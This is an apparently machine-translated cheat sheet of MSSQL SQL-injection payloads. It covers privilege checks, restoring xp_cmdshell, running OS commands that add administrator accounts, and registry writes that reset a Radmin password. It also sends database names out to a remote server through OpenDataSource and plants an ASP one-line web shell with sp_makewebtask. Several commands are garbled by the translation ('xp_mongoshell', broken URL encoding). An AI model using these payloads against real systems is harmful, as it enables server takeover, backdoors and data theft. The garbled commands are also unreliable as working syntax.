// Check the permissions.
And 1 = (select is_member ('db _ owner '))
And char (124) % 2 bcast (is_member ('db _ owner') as varchar (1) % 2 bchar (124) = 1 ;--
// Check whether you have the permission to read a database
And 1 = (select has_dbaccess ('master '))
And char (124) % 2 bcast (has_dbaccess ('master') as varchar (1) % 2 bchar (124) = 1 --
Numeric type
And char (124) % 2 Buser % 2 bchar (124) = 0
Character Type
'And char (124) % 2 Buser % 2 bchar (124) = 0 and ''='
Search type
'And char (124) % 2 Buser % 2 bchar (124) = 0 and' % '='
Brute-force Username
And user> 0
'And user> 0 and ''='
Check whether the permission is sa
And 1 = (select is_srvrolemember ('sysadmin '));--
And char (124) % 2 bcast (is_srvrolemember (0x730079007300610064006d0069006e00) as varchar (1) % 2 bchar (124) = 1 --
Check whether MSSQL database is used
And exists (select * From sysobjects );--
Check whether multiple rows are supported
; Declare @ d int ;--
Restore xp_mongoshell
; Exec master .. DBO. sp_addextendedproc 'xp _ mongoshell', 'xp log70. dll ';--
Select * From OpenRowSet ('sqloledb', 'server = 192.168.1.200, 1433; uid = test; Pwd = pafsp', 'select @ version ')
//-----------------------
// Execute the command
//-----------------------
First, enable the sandbox mode:
Exec master.. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ jet \ 4.0 \ engines', 'sandboxmode', 'reg _ dword', 1
Then run the system command using jet. oledb.
Select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = c: \ winnt \ system32 \ IAS. MDB ', 'select shell ("cmd.exe/C net user admin admin1234/Add ")')
Execute Command
; Declare @ shell int exec sp_oacreate 'wscript. shell ', @ shell output exec sp_oamethod @ shell, 'run', null, 'c: \ winnt \ system32 \ cmd.exe/C net user PAF pafpaf/add ';--
Exec [Master]. [DBO]. [xp_mongoshell] 'COMMAND/c md c: \ 8080'
Determine whether the xp_mongoshell extended storage process exists:
Http: // 192.168.1.5/display. asp? Keyno = 188 and 1 = (select count (*) from Master. DBO. sysobjects where xtype = 'X' and name = 'xp _ Your shell ')
Write registry
Exec master.. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ jet \ 4.0 \ engines', 'sandboxmode', 'reg _ dword', 1
REG_SZ
Read Registry
Exec master.. xp_regread 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon', 'userinit'
Read directory content
Exec master .. xp_dirtree 'C: \ winnt \ system32 \ ', 1, 1
Database Backup
Backup database pubs to disk = 'C: \ 123. Bak'
// Burst length
And (select char (124) % 2 bcast (count (1) as varchar (8000) % 2 bchar (124) from d99_tmp) = 0 ;--
To change the SA password, run the following command:
Exec sp_password null, 'new password', 'sa'
Test:
Exec master. DBO. sp_addlogin test, ptlove
Exec master. DBO. SP_ADDSRVROLEMEMBER test, SysAdmin
Delete the xp_mongoshell statement in the extended stored procedure:
Exec sp_dropextendedproc 'xp _ export shell'
Added extended storage process
Exec [Master] .. sp_addextendedproc 'xp _ proxiedadata', 'c: \ winnt \ system32 \ sqllog. dll'
Grant exec on xp_proxiedadata to public
Stop or activate a service.
Exec master.. xp_servicecontrol 'stop', 'schedule'
Exec master.. xp_servicecontrol 'start', 'schedule'
DBO. xp_subdirs
Only list subdirectories in a directory.
Xp_getfiledetails 'C: \ Inetpub \ wwwroot \ sqlinject \ login. asp'
DBO. xp_makecab
Compress multiple target files to a specific target file.
All files to be compressed can be connected to the end of the parameter column and separated by commas.
DBO. xp_makecab
'C: \ test. cab', 'mszip ', 1,
'C: \ Inetpub \ wwwroot \ sqlinject \ login. asp ',
'C: \ Inetpub \ wwwroot \ sqlinject \ securelogin. asp'
Xp_terminate_process
Stopping an executionProgramBut the parameter is the process ID.
Select "View"-"select field" in the "Work administrator" menu to view the process ID of each execution program.
Xp_terminate_process 2484
Xp_unpackcab
Uncompress the file.
Xp_unpackcab 'C: \ test. cab', 'c: \ Temp ', 1
A computer installed with radmin, the password was modified, and regedit.exewas not found to be deleted or changed. net.exe does not exist. There is no way to use Regedit/E to import the registration file, but MSSQL is the SA permission. Run the following command to Exec master. DBO. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'System \ Radmin \ V2.0 \ Server \ Parameters', 'parameter ', 'reg _ binary', 0x02ba5e187e2589be6f80da0046aa7e3c, you can change the password to 12345678. If you want to modify the port value exec master. DBO. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'System \ Radmin \ V2.0 \ Server \ Parameters', 'Port', 'reg _ binary ', and 0xd20400 change port value to 1234
Create Database LCX;
Create Table Ku (name nvarchar (256) null );
Create Table Biao (ID int null, name nvarchar (256) null );
// Obtain the Database Name
Insert into OpenDataSource ('sqloledb', 'server = 211.39.145.163, 1443; uid = test; Pwd = pafpaf; database = lcx '). LCX. DBO. ku select name from master. DBO. sysdatabases
// Create a table in the master to check the Permissions
Create Table master .. d_test (ID nvarchar (4000) null, data nvarchar (4000) null );--
Use sp_makewebtask to directly write a sentence in the web directory:
Http: // 127.0.0.1/dblogin123.asp? Username = 123 '; Exec % 20sp_makewebtask % 20 'd: \ www \ TT \ 88. ASP ',' % 20 select % 20 ''<% 25 execute (Request (" A ") % 25>'' % 20 ';--
// Update table content
Update films set kind = 'dramatic 'Where id = 123
// Delete content
Delete from table_name where stockid = 3